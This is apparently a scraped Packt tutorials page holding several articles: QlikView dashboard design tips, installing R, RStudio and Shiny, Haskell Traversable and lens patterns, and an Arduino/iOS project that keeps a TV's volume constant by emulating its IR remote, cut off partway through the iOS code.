advisable, as it adds context to the data. It can help you find the most commonly selected items in a list box, distinguish which slice is bigger on a pie chart when the sizes are similar, or easily spot the outliners in other graphic representations. Alignment and distribution Most of my colleagues argue that I am on the verge of an obsessive-compulsive disorder, but I cannot stand an application with unaligned objects. (Actually, I am still struggling with the fact that the paragraphs in this book are not justified, but anyway...). The design toolbar offers useful options in this regard, so there is no excuse for not having a tidy dashboard. If you take care of the quadrature of all the charts and filters, your interface will display a clean and professional look that every user will appreciate: Animations I have a rule of thumb regarding chart animation in QlikView—If you are Hans Rosling, go ahead. If not, better think it over twice. Even though they can be very illustrative, chart animations end up being a distraction rather than a tool to help us visualize data most of the time, so be conservative about their use. For those of you who do not know him, Hans Rosling is a Swedish professor of international health who works in Stockholm. However, he is best known for his amazing way of presenting data with GapMinder, a simple piece of software that allows him to animate a scatter plot. If you are a data enthusiast, you ought to watch his appearances in TED Talks. Avoiding scroll bars Throughout his work, Stephen Few emphasizes that all the information in a dashboard must fit on a single screen. Whilst I believe that there is no harm in splitting the data in multiple sheets, it is undeniable that scroll bars reduce the overall usability of an application. If the user has to continuously scroll right and left to read all the figures in a table, or if she must go up and down to see the filter panel, she will end up getting tired and eventually discard your dashboard. Consistency If you want to create an easy way to navigate your dashboard, you cannot forget about consistency. Locating standard objects (such as Current Selections Box, Search Object, and Filter Panels) in the same area in every tab will help the users easily find all the items they need. In addition, applying the same style, fonts, and color palettes in all your charts will make your dashboard look more elegant and professional. White space The space between charts, tables, and filters is often referred to as white space, and even though you may not notice it, it is a vital part of any dashboard. Displaying dozens of objects without letting them breathe makes your interface look cluttered and, therefore, harder to understand. Some of the benefits of using white space adequately are: The improvement in readability It focuses and emphasizes the important objects It guides the users' eyes, creating a sense of hierarchy in the dashboard It fosters a balanced layout, making your interface look clear and sophisticated Applying makeup Every now and then, you stumble upon delicate situations where some business users try their best to hide certain parts of the data. Whether it is about low sales or the insane amount of defective products, they often ask you to remove a few charts or avoid visual cues so that those numbers go unnoticed. Needless to say, dashboards are tools intended to inform and guide the decisions of the viewers, so avoid presenting misleading visualizations. Meaningless variety As a designer, you will often hesitate to use the same chart type multiple times in your application fearing that the users will get bored of it. Though this may be a haunting perception, if you present valuable data in an adequate format, there is no need to add new types of charts just for variety's sake. We want to keep the users engaged with great analyses, not just with pretty graphics. Summary In this article, you learned all about the best practices to be followed in Qlikview. Resources for Article: Further resources on this subject: Analyzing Financial Data in QlikView[article] Securing QlikView Documents[article] Common QlikView script errors [article]

0
0
9683

article-image-introducing-r-rstudio-and-shiny

Packt

25 Sep 2015

9 min read

Introducing R, RStudio, and Shiny

Packt

25 Sep 2015

9 min read

In this article, by Hernán G. Resnizky, author of the book Learning Shiny, the main objective will be to learn how to install all the needed components to build an application in R with Shiny. Additionally, some general ideas about what R is will be covered in order to be able to dive deeper into programming using R. The following topics will be covered: A brief introduction to R, RStudio, and Shiny Installation of R and Shiny General tips and tricks (For more resources related to this topic, see here.) About R As stated on the R-project main website: "R is a language and environment for statistical computing and graphics." R is a successor of S and is a GNU project. This means, briefly, that anyone can have access to its source codes and can modify or adapt it to their needs. Nowadays, it is gaining territory over classic commercial software, and it is, along with Python, the most used language for statistics and data science. Regarding R's main characteristics, the following can be considered: Object oriented: R is a language that is composed mainly of objects and functions. Can be easily contributed to: Similar to GNU projects, R is constantly being enriched by user's contributions either by making their codes accessible via "packages" or libraries, or by editing/improving its source code. There are actually almost 7000 packages in the common R repository, Comprehensive R Archive Network (CRAN). Additionally, there are R repositories of public access, such as bioconductor project that contains packages for bioinformatics. Runtime execution: Unlike C or Java, R does not need compilation. This means that you can, for instance, write 2 + 2 in the console and it will return the value. Extensibility: The R functionalities can be extended through the installation of packages and libraries. Standard proven libraries can be found in CRAN repositories and are accessible directly from R by typing install.packages(). Installing R R can be installed in every operating system. It is highly recommended to download the program directly from http://cran.rstudio.com/ when working on Windows or Mac OS. On Ubuntu, R can be easily installed from the terminal as follows: sudo apt-get update sudo apt-get install r-base sudo apt-get install r-base-dev The installation of r-base-dev is highly recommended as it is a package that enables users to compile the R packages from source, that is, maintain the packages or install additional R packages directly from the R console using the install.packages() command. To install R on other UNIX-based operating systems, visit the following links: http://cran.rstudio.com/ http://cran.r-project.org/doc/manuals/r-release/R-admin.html#Obtaining-R A quick guide to R When working on Windows, R can be launched via its application. After the installation, it is available as any other program on Windows. When opening the program, a window like this will appear: When working on Linux, you can access the R console directly by typing R on the command line: In both the cases, R executes in runtime. This means that you can type in code, press Enter, and the result will be given immediately as follows: > 2+2 [1] 4 The R application in any operating system does not provide an easy environment to develop code. For this reason, it is highly recommended (not only to write web applications in R with Shiny, but for any task you want to perform in R) to use an Integrated Development Environment (IDE). About RStudio As with other programming languages, there is a huge variety of IDEs available for R. IDEs are applications that make code development easier and clearer for the programmer. RStudio is one of the most important ones for R, and it is especially recommended to write web applications in R with Shiny because this contains features specially designed for R. Additionally, RStudio provides facilities to write C++, Latex, or HTML documents and also integrates them to the R code. RStudio also provides version control, project management, and debugging features among many others. Installing RStudio RStudio for desktop computers can be downloaded from its official website at http://www.rstudio.com/products/rstudio/download/ where you can get versions of the software for Windows, MAC OS X, Ubuntu, Debian, and Fedora. Quick guide to RStudio Before installing and running RStudio, it is important to have R installed. As it is an IDE and not the programming language, it will not work at all. The following screenshot shows RStudio's starting view: At the first glance, the following four main windows are available: Text editor: This provides facilities to write the R scripts such as highlighting and a code completer (when hitting Tab, you can see the available options to complete the code written). It is also possible to include the R code in an HTML, Latex, or C++ piece of code. Environment and history: They are defined as follows: In the Environment section, you can see the active objects in each environment. By clicking on Global Environment (which is the environment shown by default), you can change the environment and see the active objects. In the History tab, the pieces of codes executed are stored line by line. You can select one or more lines and send them either to the editor or to the console. In addition, you can look up for a certain specific piece of code by typing it in the textbox in the top right part of this window. Console: This is an exact equivalent of R console, as described in Quick guide of R. Tabs: The different tabs are defined as follows: Files: This consists of a file browser with several additional features (renaming, deleting, and copying). Clicking on a file will open it in editor or the Environment tab depending on the type of the file. If it is a .rda or .RData file, it will open in both. If it is a text file, it will open in one of them. Plots: Whenever a plot is executed, it will be displayed in that tab. Packages: This shows a list of available and active packages. When the package is active, it will appear as clicked. Packages can also be installed interactively by clicking on Install Packages. Help: This is a window to seek and read active packages' documentation. Viewer: This enables us to see the HTML-generated content within RStudio. Along with numerous features, RStudio also provides keyboard shortcuts. A few of them are listed as follows: Description Windows/Linux OSX Complete the code. Tab Tab Run the selected piece of code. If no piece of code is selected, the active line is run. Ctrl + Enter ⌘ + Enter Comment the selected block of code. Ctrl + Shift + C ⌘ + / Create a section of code, which can be expanded or compressed by clicking on the arrow to the left. Additionally, it can be accessed by clicking on it in the bottom left menu. ##### ##### Find and replace. Ctrl + F ⌘ + F The following screenshots show how a block of code can be collapsed by clicking on the arrow and how it can be accessed quickly by clicking on its name in the bottom-left part of the window: Clicking on the circled arrow will collapse the Section 1 block, as follows: The full list of shortcuts can be found at https://support.rstudio.com/hc/en-us/articles/200711853-Keyboard-Shortcuts. For further information about other RStudio features, the full documentation is available at https://support.rstudio.com/hc/en-us/categories/200035113-Documentation. About Shiny Shiny is a package created by RStudio, which enables to easily interface R with a web browser. As stated in its official documentation, Shiny is a web application framework for R that makes it incredibly easy to build interactive web applications with R. One of its main advantages is that there is no need to combine R code with HTML/JavaScript code as the framework already contains prebuilt features that cover the most commonly used functionalities in a web interactive application. There is a wide range of software that has web application functionalities, especially oriented to interactive data visualization. What are the advantages of using R/Shiny then, you ask? They are as follows: It is free not only in terms of money, but as all GNU projects, in terms of freedom. As stated in the GNU main page: To understand the concept (GNU), you should think of free as in free speech, not as in free beer. Free software is a matter of the users' freedom to run, copy, distribute, study, change, and improve the software. All the possibilities of a powerful language such as R is available. Thanks to its contributive essence, you can develop a web application that can display any R-generated output. This means that you can, for instance, run complex statistical models and return the output in a friendly way in the browser, obtain and integrate data from the various sources and formats (for instance, SQL, XML, JSON, and so on) the way you need, and subset, process, and dynamically aggregate the data the way you want. These options are not available (or are much more difficult to accomplish) under most of the commercial BI tools. Installing and loading Shiny As with any other package available in the CRAN repositories, the easiest way to install Shiny is by executing install.packages("shiny"). The following output should appear on the console: Due to R's extensibility, many of its packages use elements (mostly functions) from other packages. For this reason, these packages are loaded or installed when the package that is dependent on them is loaded or installed. This is called dependency. Shiny (on its 0.10.2.1 version) depends on Rcpp, httpuv, mime, htmltools, and R6. An R session is started only with the minimal packages loaded. So if functions from other packages are used, they need to be loaded before using them. The corresponding command for this is as follows: library(shiny) When installing a package, the package name must be quoted but when loading the package, it must be unquoted. Summary After these instructions, the reader should be able to install all the fundamental elements to create a web application with Shiny. Additionally, he or she must have acquired at least a general idea of what R and the R project is. Resources for Article: Further resources on this subject: R ─ Classification and Regression Trees[article] An overview of common machine learning tasks[article] Taking Control of Reactivity, Inputs, and Outputs [article]

0
0
33103

How-To Tutorials

Packt

25 Sep 2015

15 min read

Patterns of Traversing

Packt

25 Sep 2015

15 min read

In this article by Ryan Lemmer, author of the book Haskell Design Patterns, we will focus on two fundamental patterns of recursion: fold and map. The more primitive forms of these patterns are to be found in the Prelude, the "old part" of Haskell. With the introduction of Applicative, came more powerful mapping (traversal), which opened the door to type-level folding and mapping in Haskell. First, we will look at how Prelude's list fold is generalized to all Foldable containers. Then, we will follow the generalization of list map to all Traversable containers. Our exploration of fold and map culminates with the Lens library, which raises Foldable and Traversable to an even higher level of abstraction and power. In this article, we will cover the following: Traversable Modernizing Haskell Lenses (For more resources related to this topic, see here.) Traversable As with Prelude.foldM, mapM fails us beyond lists, for example, we cannot mapM over the Tree from earlier: main = mapM doF aTree >>= print -- INVALID The Traversable type-class is to map in the same way as Foldable is to fold: -- required: traverse or sequenceA class (Functor t, Foldable t) => Traversable (t :: * -> *) where -- APPLICATIVE form traverse :: Applicative f => (a -> f b) -> t a -> f (t b) sequenceA :: Applicative f => t (f a) -> f (t a) -- MONADIC form (redundant) mapM :: Monad m => (a -> m b) -> t a -> m (t b) sequence :: Monad m => t (m a) -> m (t a) The traverse fuction generalizes our mapA function, which was written for lists, to all Traversable containers. Similarly, Traversable.mapM is a more general version of Prelude.mapM for lists: mapM :: Monad m => (a -> m b) -> [a] -> m [b] mapM :: Monad m => (a -> m b) -> t a -> m (t b) The Traversable type-class was introduced along with Applicative: "we introduce the type class Traversable, capturing functorial data structures through which we can thread an applicative computation" Applicative Programming with Effects - McBride and Paterson A Traversable Tree Let's make our Traversable Tree. First, we'll do it the hard way: – a Traversable must also be a Functor and Foldable: instance Functor Tree where fmap f (Leaf x) = Leaf (f x) fmap f (Node x lTree rTree) = Node (f x) (fmap f lTree) (fmap f rTree) instance Foldable Tree where foldMap f (Leaf x) = f x foldMap f (Node x lTree rTree) = (foldMap f lTree) `mappend` (f x) `mappend` (foldMap f rTree) --traverse :: Applicative ma => (a -> ma b) -> mt a -> ma (mt b) instance Traversable Tree where traverse g (Leaf x) = Leaf <$> (g x) traverse g (Node x ltree rtree) = Node <$> (g x) <*> (traverse g ltree) <*> (traverse g rtree) data Tree a = Node a (Tree a) (Tree a) | Leaf a deriving (Show) aTree = Node 2 (Leaf 3) (Node 5 (Leaf 7) (Leaf 11)) -- import Data.Traversable main = traverse doF aTree where doF n = do print n; return (n * 2) The easier way to do this is to auto-implement Functor, Foldable, and Traversable: {-# LANGUAGE DeriveFunctor #-} {-# LANGUAGE DeriveFoldable #-} {-# LANGUAGE DeriveTraversable #-} import Data.Traversable data Tree a = Node a (Tree a) (Tree a)| Leaf a deriving (Show, Functor, Foldable, Traversable) aTree = Node 2 (Leaf 3) (Node 5 (Leaf 7) (Leaf 11)) main = traverse doF aTree where doF n = do print n; return (n * 2) Traversal and the Iterator pattern The Gang of Four Iterator pattern is concerned with providing a way "...to access the elements of an aggregate object sequentially without exposing its underlying representation" "Gang of Four" Design Patterns, Gamma et al, 1995 In The Essence of the Iterator Pattern, Jeremy Gibbons shows precisely how the Applicative traversal captures the Iterator pattern. The Traversable.traverse class is the Applicative version of Traversable.mapM, which means it is more general than mapM (because Applicative is more general than Monad). Moreover, because mapM does not rely on the Monadic bind chain to communicate between iteration steps, Monad is a superfluous type for mapping with effects (Applicative is sufficient). In other words, Applicative traverse is superior to Monadic traversal (mapM): "In addition to being parametrically polymorphic in the collection elements, the generic traverse operation is parametrised along two further dimensions: the datatype being tra- versed, and the applicative functor in which the traversal is interpreted" "The improved compositionality of applicative functors over monads provides better glue for fusion of traversals, and hence better support for modular programming of iterations" The Essence of the Iterator Pattern - Jeremy Gibbons Modernizing Haskell 98 The introduction of Applicative, along with Foldable and Traversable, had a big impact on Haskell. Foldable and Traversable lift Prelude fold and map to a much higher level of abstraction. Moreover, Foldable and Traversable also bring a clean separation between processes that preserve or discard the shape of the structure that is being processed. Traversable describes processes that preserve that shape of the data structure being traversed over. Foldable processes, in turn, discard or transform the shape of the structure being folded over. Since Traversable is a specialization of Foldable, we can say that shape preservation is a special case of shape transformation. This line between shape preservation and transformation is clearly visible from the fact that functions that discard their results (for example, mapM_, forM_, sequence_, and so on) are in Foldable, while their shape-preserving counterparts are in Traversable. Due to the relatively late introduction of Applicative, the benefits of Applicative, Foldable, and Traversable have not found their way into the core of the language. This is due to the change with the Foldable Traversable In Prelude proposal (planned for inclusion in the core libraries from GHC 7.10). For more information, visit https://wiki.haskell.org/Foldable_Traversable_In_Prelude. This will involve replacing less generic functions in Prelude, Control.Monad, and Data.List with their more polymorphic counterparts in Foldable and Traversable. There have been objections to the movement to modernize, the main concern being that more generic types are harder to understand, which may compromise Haskell as a learning language. These valid concerns will indeed have to be addressed, but it seems certain that the Haskell community will not resist climbing to new abstract heights. Lenses A Lens is a type that provides access to a particular part of a data structure. Lenses express a high-level pattern for composition. However, Lens is also deeply entwined with Traversable, and so we describe it in this article instead. Lenses relate to the getter and setter functions, which also describe access to parts of data structures. To find our way to the Lens abstraction (as per Edward Kmett's Lens library), we'll start by writing a getter and setter to access the root node of a Tree. Deriving Lens Returning to our Tree from earlier: data Tree a = Node a (Tree a) (Tree a) | Leaf a deriving (Show) intTree = Node 2 (Leaf 3) (Node 5 (Leaf 7) (Leaf 11)) listTree = Node [1,1] (Leaf [2,1]) (Node [3,2] (Leaf [5,2]) (Leaf [7,4])) tupleTree = Node (1,1) (Leaf (2,1)) (Node (3,2) (Leaf (5,2)) (Leaf (7,4))) Let's start by writing generic getter and setter functions: getRoot :: Tree a -> a getRoot (Leaf z) = z getRoot (Node z _ _) = z setRoot :: Tree a -> a -> Tree a setRoot (Leaf z) x = Leaf x setRoot (Node z l r) x = Node x l r main = do print $ getRoot intTree print $ setRoot intTree 11 print $ getRoot (setRoot intTree 11) If we want to pass in a setter function instead of setting a value, we use the following: fmapRoot :: (a -> a) -> Tree a -> Tree a fmapRoot f tree = setRoot tree newRoot where newRoot = f (getRoot tree) We have to do a get, apply the function, and then set the result. This double work is akin to the double traversal we saw when writing traverse in terms of sequenceA. In that case we resolved the issue by defining traverse first (and then sequenceA i.t.o. traverse): We can do the same thing here by writing fmapRoot to work in a single step (and then rewriting setRoot' i.t.o. fmapRoot'): fmapRoot' :: (a -> a) -> Tree a -> Tree a fmapRoot' f (Leaf z) = Leaf (f z) fmapRoot' f (Node z l r) = Node (f z) l r setRoot' :: Tree a -> a -> Tree a setRoot' tree x = fmapRoot' (_ -> x) tree main = do print $ setRoot' intTree 11 print $ fmapRoot' (*2) intTree The fmapRoot' function delivers a function to a particular part of the structure and returns the same structure: fmapRoot' :: (a -> a) -> Tree a -> Tree a To allow for I/O, we need a new function: fmapRootIO :: (a -> IO a) -> Tree a -> IO (Tree a) We can generalize this beyond I/O to all Monads: fmapM :: (a -> m a) -> Tree a -> m (Tree a) It turns out that if we relax the requirement for Monad, and generalize f' to all the Functor container types, then we get a simple van Laarhoven Lens! type Lens' s a = Functor f' => (a -> f' a) -> s -> f' s The remarkable thing about a van Laarhoven Lens is that given the preceding function type, we also gain "get", "set", "fmap", "mapM", and many other functions and operators. The Lens function type signature is all it takes to make something a Lens that can be used with the Lens library. It is unusual to use a type signature as "primary interface" for a library. The immediate benefit is that we can define a lens without referring to the Lens library. We'll explore more benefits and costs to this approach, but first let's write a few lenses for our Tree. The derivation of the Lens abstraction used here has been based on Jakub Arnold's Lens tutorial, which is available at http://blog.jakubarnold.cz/2014/07/14/lens-tutorial-introduction-part-1.html. Writing a Lens A Lens is said to provide focus on an element in a data structure. Our first lens will focus on the root node of a Tree. Using the lens type signature as our guide, we arrive at: lens':: Functor f => (a -> f' a) -> s -> f' s root :: Functor f' => (a -> f' a) -> Tree a -> f' (Tree a) Still, this is not very tangible; fmapRootIO is easier to understand with the Functor f' being IO: fmapRootIO :: (a -> IO a) -> Tree a -> IO (Tree a) fmapRootIO g (Leaf z) = (g z) >>= return . Leaf fmapRootIO g (Node z l r) = (g z) >>= return . (x -> Node x l r) displayM x = print x >> return x main = fmapRootIO displayM intTree If we drop down from Monad into Functor, we have a Lens for the root of a Tree: root :: Functor f' => (a -> f' a) -> Tree a -> f' (Tree a) root g (Node z l r) = fmap (x -> Node x l r) (g z) root g (Leaf z) = fmap Leaf (g z) As Monad is a Functor, this function also works with Monadic functions: main = root displayM intTree As root is a lens, the Lens library gives us the following: -– import Control.Lens main = do -- GET print $ view root listTree print $ view root intTree -- SET print $ set root [42] listTree print $ set root 42 intTree -- FMAP print $ over root (+11) intTree The over is the lens way of fmap'ing a function into a Functor. Composable getters and setters Another Lens on Tree might be to focus on the rightmost leaf: rightMost :: Functor f' => (a -> f' a) -> Tree a -> f' (Tree a) rightMost g (Node z l r) = fmap (r' -> Node z l r') (rightMost g r) rightMost g (Leaf z) = fmap (x -> Leaf x) (g z) The Lens library provides several lenses for Tuple (for example, _1 which brings focus to the first Tuple element). We can compose our rightMost lens with the Tuple lenses: main = do print $ view rightMost tupleTree print $ set rightMost (0,0) tupleTree -- Compose Getters and Setters print $ view (rightMost._1) tupleTree print $ set (rightMost._1) 0 tupleTree print $ over (rightMost._1) (*100) tupleTree A Lens can serve as a getter, setter, or "function setter". We are composing lenses using regular function composition (.)! Note that the order of composition is reversed in (rightMost._1) the rightMost lens is applied before the _1 lens. Lens Traversal A Lens focuses on one part of a data structure, not several, for example, a lens cannot focus on all the leaves of a Tree: set leaves 0 intTree over leaves (+1) intTree To focus on more than one part of a structure, we need a Traversal class, the Lens generalization of Traversable). Whereas Lens relies on Functor, Traversal relies on Applicative. Other than this, the signatures are exactly the same: traversal :: Applicative f' => (a -> f' a) -> Tree a -> f' (Tree a) lens :: Functor f'=> (a -> f' a) -> Tree a -> f' (Tree a) A leaves Traversal delivers the setter function to all the leaves of the Tree: leaves :: Applicative f' => (a -> f' a) -> Tree a -> f' (Tree a) leaves g (Node z l r) = Node z <$> leaves g l <*> leaves g r leaves g (Leaf z) = Leaf <$> (g z) We can use set and over functions with our new Traversal class: set leaves 0 intTree over leaves (+1) intTree The Traversals class compose seamlessly with Lenses: main = do -- Compose Traversal + Lens print $ over (leaves._1) (*100) tupleTree -- Compose Traversal + Traversal print $ over (leaves.both) (*100) tupleTree -- map over each elem in target container (e.g. list) print $ over (leaves.mapped) (*(-1)) listTree -- Traversal with effects mapMOf leaves displayM tupleTree (The both is a Tuple Traversal that focuses on both elements). Lens.Fold The Lens.Traversal lifts Traversable into the realm of lenses: main = do print $ sumOf leaves intTree print $ anyOf leaves (>0) intTree The Lens Library We used only "simple" Lenses so far. A fully parametrized Lens allows for replacing parts of a data structure with different types: type Lens s t a b = Functor f' => (a -> f' b) -> s -> f' t –- vs simple Lens type Lens' s a = Lens s s a a Lens library function names do their best to not clash with existing names, for example, postfixing of idiomatic function names with "Of" (sumOf, mapMOf, and so on), or using different verb forms such as "droppingWhile" instead of "dropWhile". While this creates a burden as i.t.o has to learn new variations, it does have a big plus point—it allows for easy unqualified import of the Lens library. By leaving the Lens function type transparent (and not obfuscating it with a new type), we get Traversals by simply swapping out Functor for Applicative. We also get to define lenses without having to reference the Lens library. On the downside, Lens type signatures can be bewildering at first sight. They form a language of their own that requires effort to get used to, for example: mapMOf :: Profunctor p => Over p (WrappedMonad m) s t a b -> p a (m b) -> s -> m t foldMapOf :: Profunctor p => Accessing p r s a -> p a r -> s -> r On the surface, the Lens library gives us composable getters and setters, but there is much more to Lenses than that. By generalizing Foldable and Traversable into Lens abstractions, the Lens library lifts Getters, Setters, Lenses, and Traversals into a unified framework in which they are all compose together. Edward Kmett's Lens library is a sprawling masterpiece that is sure to leave a lasting impact on idiomatic Haskell. Summary We started with Lists (Haskel 98), then generalizing for all Traversable containers (Introduced in the mid-2000s). Following that, we saw how the Lens library (2012) places traversing in an even broader context. Lenses give us a unified vocabulary to navigate data structures, which explains why it has been described as a "query language for data structures". Resources for Article: Further resources on this subject: Plotting in Haskell[article] The Hunt for Data[article] Getting started with Haskell [article]

0
0
15213

article-image-tv-set-constant-volume-controller

Packt

25 Sep 2015

19 min read

TV Set Constant Volume Controller

Packt

25 Sep 2015

19 min read

In this article by Fabizio Boco, author of Arduino iOS Bluprints, we learn how to control a TV set volume using Arduino and iOS. I don't watch TV much, but when I do, I usually completely relax and fall asleep. I know that TV is not meant for putting you off to sleep, but it does this to me. Unfortunately, commercials are transmitted at a very high volume and they wake me up. How can I relax if commercials wake me up every five minutes? Can you believe it? During one of my naps between two commercials, I came up with a solution based on iOS and Arduino. It's nothing complex. An iOS device listens to the TV set's audio, and when the audio level becomes higher than a preset threshold, the iOS device sends a message (via Bluetooth) to Arduino, which controls the TV set volume, emulating the traditional IR remote control. Exactly the same happens when the volume drops below another threshold. The final result is that the TV set volume is almost constant, independent of what is on the air. This helps me sleep longer! The techniques that you are going to learn in this article are useful in many different ways. You can use an IR remote control for any purpose, or you can control many different devices, such as a CD/DVD player, a stereo set, Apple TV, a projector, and so on, directly from an Arduino and iOS device. As always, it is up to your imagination. (For more resources related to this topic, see here.) Constant Volume Controller requirements Our aim is to design an Arduino-based device, which can make the TV set's volume almost constant by emulating the traditional remote controller, and an iOS application, which monitors the TV and decides when to decrease or increase the TV set's volume. Hardware Most TV sets can be controlled by an IR remote controller, which sends signals to control the volume, change the channel, and control all the other TV set functions. IR remote controllers use a carrier signal (usually at 38 KHz) that is easy to isolate from noise and disturbances. The carrier signal is turned on and off by following different rules (encoding) in order to transmit the 0 and 1 digital values. The IR receiver removes the carrier signal (with a pass low filter) and decodes the remaining signal by returning a clear sequence of 0 and 1. The IR remote control theory You can find more information about the IR remote control at http://bit.ly/1UjhsIY. Our circuit will emulate the IR remote controller by using an IR LED, which will send specific signals that can be interpreted by our TV set. On the other hand, we can receive an IR signal with a phototransistor and decode it into an understandable sequence of numbers by designing a demodulator and a decoder. Nowadays, electronics is very simple; an IR receiver module (Vishay 4938) will manage the complexity of signal demodulation, noise cancellation, triggering, and decoding. It can be directly connected to Arduino, making everything very easy. In the project in this article, we need an IR receiver to discover the coding rules that are used by our own IR remote controller (and the TV set). Additional electronic components In this project, we need the following additional components: IR LED Vishay TSAL6100 IR Receiver module Vishay TSOP 4838 Resistor 100Ω Resistor 680Ω Electrolytic capacitor 0.1μF Electronic circuit The following picture shows the electrical diagram of the circuit that we need for the project: The IR receiver will be used only to capture the TV set's remote controller signals so that our circuit can emulate them. However, an IR LED is constantly used to send commands to the TV set. The other two LEDs will show when Arduino increases or decreases the volume. They are optional and can be omitted. As usual, the Bluetooth device is used to receive commands from the iOS device. Powering the IR LED in the current limits of Arduino From the datasheet of the TSAL6100, we know that the forward voltage is 1.35V. The voltage drop along R1 is then 5-1.35 = 3.65V, and the current provided by Arduino to power the LED is about 3.65/680=5.3 mA. The maximum current that is allowed for each PIN is 40 mA (the recommended value is 20 mA). So, we are within the limits. In case your TV set is far from the LED, you may need to reduce the R1 resistor in order to get more current (and the IR light). Use a new value of R1 in the previous calculations to check whether you are within the Arduino limits. For more information about the Arduino PIN current, check out http://bit.ly/1JosGac. The following diagram shows how to mount the circuit on a breadboard: Arduino code The entire code of this project can be downloaded from https://www.packtpub.com/books/content/support. To understand better the explanations in the following paragraphs, open the downloaded code while reading them. In this project, we are going to use the IR remote library, which helps us code and decode IR signals. The library can be downloaded from http://bit.ly/1Isd8Ay and installed by using the following procedure: Navigate to the release page of http://bit.ly/1Isd8Ay in order to get the latest release and download the IRremote.zip file. Unzip the file whatever you like. Open the Finder and then the Applications folder (Shift + Control + A). Locate the Arduino application. Right-click on it and select Show Package Contents. Locate the Java folder and then libraries. Copy the IRremote folder (unzipped in step 2) into the libraries folder. Restart Arduino if you have it running. In this project, we need the following two Arduino programs: One is used to acquire the codes that your IR remote controller sends to increase and decrease the volume The other is the main program that Arduino has to run to automatically control the TV set volume Let's start with the code that is used to acquire the IR remote controller codes. Decoder setup code In this section, we will be referring to the downloaded Decode.ino program that is used to discover the codes that are used by your remote controller. Since the setup code is quite simple, it doesn't require a detailed explanation; it just initializes the library to receive and decode messages. Decoder main program In this section, we will be referring to the downloaded Decode.ino program; the main code receives signals from the TV remote controller and dumps the appropriate code, which will be included in the main program to emulate the remote controller itself. Once the program is run, if you press any button on the remote controller, the console will show the following: For IR Scope: +4500 -4350 … For Arduino sketch: unsigned int raw[68] = {4500,4350,600,1650,600,1600,600,1600,…}; The second row is what we need. Please refer to the Testing and tuning section for a detailed description of how to use this data. Now, we will take a look at the main code that will be running on Arduino all the time. Setup code In this section, we will be referring to the Arduino_VolumeController.ino program. The setup function initializes the nRF8001 board and configures the pins for the optional monitoring LEDs. Main program The loop function just calls the polACI function to allow the correct management of incoming messages from the nRF8001 board. The program accepts the following two messages from the iOS device (refer to the rxCallback function): D to decrease the volume I to increase the volume The following two functions perform the actual increasing and decreasing of volume by sending the two up and down buffers through the IR LED: void volumeUp() { irsend.sendRaw(up, VOLUME_UP_BUFFER_LEN, 38); delay(20); } void volumeDown() { irsend.sendRaw(down, VOLUME_DOWN_BUFFER_LEN, 38); delay(20); irsend.sendRaw(down, VOLUME_DOWN_BUFFER_LEN, 38); delay(20); } The up and down buffers, VOLUME_UP_BUFFER_LEN and VOLUME_DOWN_BUFFER_LEN, are prepared with the help of the Decode.ino program (see the Testing and Tuning section). iOS code In this article, we are going to look at the iOS application that monitors the TV set volume and sends the volume down or volume up commands to the Arduino board in order to maintain the volume at the desired value. The full code of this project can be downloaded from https://www.packtpub.com/books/content/support. To understand better the explanations in the following paragraphs, open the downloaded code while reading them. Create the Xcode project We will create a new project as we already did previously. The following are the steps that you need to follow: The following are the parameters for the new project: Project Type: Tabbed application Product Name: VolumeController Language: Objective-C Devices: Universal To set a capability for this project, perform the following steps: Select the project in the left pane of Xcode. Select Capabilities in the right pane. Turn on the Background Modes option and select Audio and AirPlay (refer to the following picture). This allows an iOS device to listen to audio signals too when the iOS device screen goes off or the app goes in the background: Since the structure of this project is very close to the Pet Door Locker, we can reuse a part of the user interface and the code by performing the following steps: Select FirstViewController.h and FirstViewController.m, right-click on them, click on Delete, and select Move to Trash. With the same procedure, deleteSecondViewControllerand Main.storyboard. Open the PetDoorLocker project in Xcode. Select the following files and drag and drop them to this project (refer to the following picture). BLEConnectionViewController.h BLEConnectionViewController.m Main.storyboardEnsure that Copy items if needed is selected and then click on Finish. Copy the icon that was used for the BLEConnectionViewController view controller. Create a new View Controller class and name it VolumeControllerViewController. Open the Main.storyboard and locate the main View Controller. Delete all the graphical components. Open the Identity Inspector and change the Class to VolumeControllerViewController. Now, we are ready to create what we need for the new application. Design the user interface for VolumeControllerViewController This view controller is the main view controller of the application and contains just the following components: The switch that turns on and off the volume control The slider that sets the desired volume of the TV set Once you have added the components and their layout constraints, you will end up with something that looks like the following screenshot: Once the GUI components are linked with the code of the view controller, we end with the following code: @interface VolumeControllerViewController () @property (strong, nonatomic) IBOutlet UISlider *volumeSlider; @end and with: - (IBAction)switchChanged:(UISwitch *)sender { … } - (IBAction)volumeChanged:(UISlider *)sender { … } Writing code for BLEConnectionViewController Since we copied this View Controller from the Pet Door Locker project, we don't need to change it apart from replacing the key, which was used to store the peripheral UUID, from PetDoorLockerDevice to VolumeControllerDevice. We saved some work! Now, we are ready to work on the VolumeControllerViewController, which is much more interesting. Writing code for VolumeControllerViewController This is the main part of the application; almost everything happens here. We need some properties, as follows: @interface VolumeControllerViewController () @property (strong, nonatomic) IBOutlet UISlider *volumeSlider; @property (strong, nonatomic) CBCentralManager *centralManager; @property (strong, nonatomic) CBPeripheral *arduinoDevice; @property (strong, nonatomic) CBCharacteristic *sendCharacteristic; @property (nonatomic,strong) AVAudioEngine *audioEngine; @property float actualVolumeDb; @property float desiredVolumeDb; @property float desiredVolumeMinDb; @property float desiredVolumeMaxDb; @property NSUInteger increaseVolumeDelay; @end Some are used to manage the Bluetooth communication and don't need much explanation. The audioEngine is the instance of AVAudioEngine, which allows us to transform the audio signal captured by the iOS device microphone in numeric samples. By analyzing these samples, we can obtain the power of the signal that is directly related to the TV set's volume (the higher the volume, the greater the signal power). Analog-to-digital conversion The operation of transforming an analog signal into a digital sequence of numbers, which represent the amplitude of the signal itself at different times, is called analog-to-digital conversion. Arduino analog inputs perform exactly the same operation. Together with the digital-to-analog conversion, it is a basic operation of digital signal processing and storing music in our devices and playing it with a reasonable quality. For more details, visit http://bit.ly/1N1QyXp. The actualVolumeDb property stores the actual volume of the signal measured in dB (short for decibel). Decibel (dB) The decibel (dB) is a logarithmic unit that expresses the ratio between two values of a physical quantity. Referring to the power of a signal, its value in decibel is calculated with the following formula: Here, P is the power of the signal and P0[PRK1] is a reference power. You can find out more about decibel at http://bit.ly/1LZQM0m. We have to point out that if P < P0[PRK2] , the value of PdB[PRK3] if lower of zero. So, decibel values are usually negative values, and 0dB indicates the maximum power of the signal. The desiredVolumeDb property stores the desired volume measured in dB, and the user controls this value through the volume slider in the main tab of the app; desiredVolumeMinDb and 